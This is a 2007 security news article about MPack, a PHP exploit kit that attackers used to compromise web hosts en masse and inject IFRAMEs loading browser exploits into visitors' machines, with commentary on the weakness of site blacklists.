New Web Attack Platform Draws Attention
When attackers single out websites for attack, whether it is to deface, infect, or extract sensitive data from, there are a number of tools that are readily available to automate the process. One such tool which has recently been created is being linked to a number of very significant website attacks, where legitimate sites were made to serve malicious content to site visitors. In just one case, more than 10,000 sites were affected when an Italian ISP was attacked. Other hosting compromises are not being made as public, even though the damage is still significant to the sites hosted by them (such as happened at DreamHost).
More of an exploit framework (sort of like MetaSploit) built in PHP, the attack tool, dubbed MPack, gives the attacker a number of choices not only in terms of how the exploit attempts will load on the target websites, but also in terms of what exploits they want the target sites to try and load in the victims' browsers. The most widespread combination being observed at the moment is an IFRAME on the homepage of affected sites, which then calls back to a hacker-controlled server and attempts to load a range of exploits that are derived from previously released public exploit code.
Of significant importance, the victim won't really notice any difference to their online experience with an affected site, making it harder for the casual web surfer to identify that something has gone wrong.
With included exploits targeting Microsoft Windows core vulnerabilities, WinZip ActiveX controls, QuickTime, and a number of other vulnerabilities, MPack is a significant threat to anybody who is not maintaining an updated system when going online.
The use of mass webhost compromises to spread the impact of an attack neatly bypasses the so-called 'protection' that blacklists of known phishing and malware sites claim to provide. It also means that advice to only visit trusted sites doesn't really hold up when the hosting provider is attacked and ALL sites are compromised.
While it is unfortunate and costly that such a large number of websites have been affected in such a quick manner, it is an excellent example of the shortcomings of antiphising and antimalware initiatives (such as SiteAdvisor) that try and ascertain the safety of a website prior to the potential victim visiting it. The risk of improper classification of a site has also increased significantly with these attacks, more so for hosting providers who are not as rigourous with their server maintenance and administration.
Researchers at iDefense have tied the emergence of MPack to a group of Russian criminals who have previously been linked to '0-day' CPanel exploits (also believed to be relevant to how they are compromising servers with this set of attacks), though the CPanel issues were actually known ahead of the exploit evolution (just not by very long), and to other malicious online activity.
With the rapid spread of affected sites, and the 'anti-malware' vendors being caught flat-footed, or being unable to adequately address the threat, it appears that many victims are already succumbing to the exploits that load when they visit an affected site. iDefense researchers indicate that more than 80,000 victims were discovered following just one attack (the number of affected sites was not mentioned).
22 June 2007
Do you like how we cover Information Security news? How about checking out our company services, delivered the same way our news is.
Let our Free OS X Screen Saver deliver the latest security alerts and commentary to your desktop when you're not at your system.Comments will soon be available for registered users.